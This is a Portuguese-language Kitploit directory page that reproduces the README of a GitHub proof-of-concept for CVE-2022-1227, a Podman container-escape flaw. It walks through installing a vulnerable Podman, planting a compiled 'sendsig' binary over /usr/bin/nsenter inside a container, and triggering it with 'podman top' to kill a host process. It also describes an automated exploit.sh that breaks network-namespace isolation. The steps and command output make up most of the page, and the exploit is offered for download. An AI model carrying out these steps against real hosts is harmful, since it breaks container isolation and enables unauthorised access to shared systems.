Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/louisliunova/cve-2022-1227_exploit
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingEscape de Contêiner
GitHublouisliunova/cve-2022-1227_exploit

CVE-2022-1227_Exploit

Um script para explorar CVE-2022-1227

Ver Repositório
14há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-1227_Exploit

Um script para explorar o CVE-2022-1227.

Contexto

  • Ubuntu 20.10 é recomendado.
  • Podman <4.0.0; 3.4.4 é recomendado.

TODO: adicionar qual é o princípio desta vulnerabilidade

Instalar podman

Siga as instruções no documento oficial: https://podman.io/getting-started/installation#installing-on-linux

Para Ubuntu 20.10, o comando de instalação deve ser:

root@kitploit:~
sudo apt-get install podman=3.4.4+ds1-1ubuntu1

Início Rápido

Exploit Simples

Nesta seção, tentamos um PoC simples para quebrar a barreira do PID namespace e kill um processo no host.

Aqui estão os passos:

  1. Execute um contêiner com o seguinte comando: podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity

  2. Execute keep em ./exp/bin e obtenha o PID em que está rodando. Normalmente ele exibirá seu PID no terminal. Como o binário está configurado para dormir por 600 segundos, talvez você precise ser rápido para concluir os passos seguintes.

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
    My process ID is: 7719
    Put this number to `PID` in the sendsig.c and compile!
    
  3. Edite o código-fonte em ./exp/src/sendsig.c e preencha o PID obtido no passo anterior na variável pid.

    root@kitploit:~
    int pid = OLD_VAL;
    

    para

    root@kitploit:~
    int pid = 7719;
    
  4. Coloque o binário compilado dentro do podman: podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter

Exploit Completo

Nesta seção, usamos sockets para realizar a comunicação socket entre processos do cliente no contêiner e do servidor no host, o que geralmente é impossível quando o mecanismo de isolamento está completo. Usamos esta vulnerabilidade para romper o isolamento do namespace de rede para realizar este exploit.

Primeiro, entre no diretório com cd ./exp;

Simplesmente executando ./exploit.sh, tudo será feito automaticamente; se tudo correr bem, o servidor exibirá:

root@kitploit:~
Hello from the container!

Isso significa que atravessamos o namespace de rede e escapamos.

Baixar ferramenta
  • Execute podman top para acionar a vulnerabilidade com: podman top -l

  • Se tudo correr bem, o processo em execução keep será morto imediatamente. Isso é incomum, pois normalmente processos dentro do contêiner não podem enviar sinais para processos no host devido ao isolamento do namespace PID.

    root@kitploit:~
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
    My process ID is: 7719
    Killed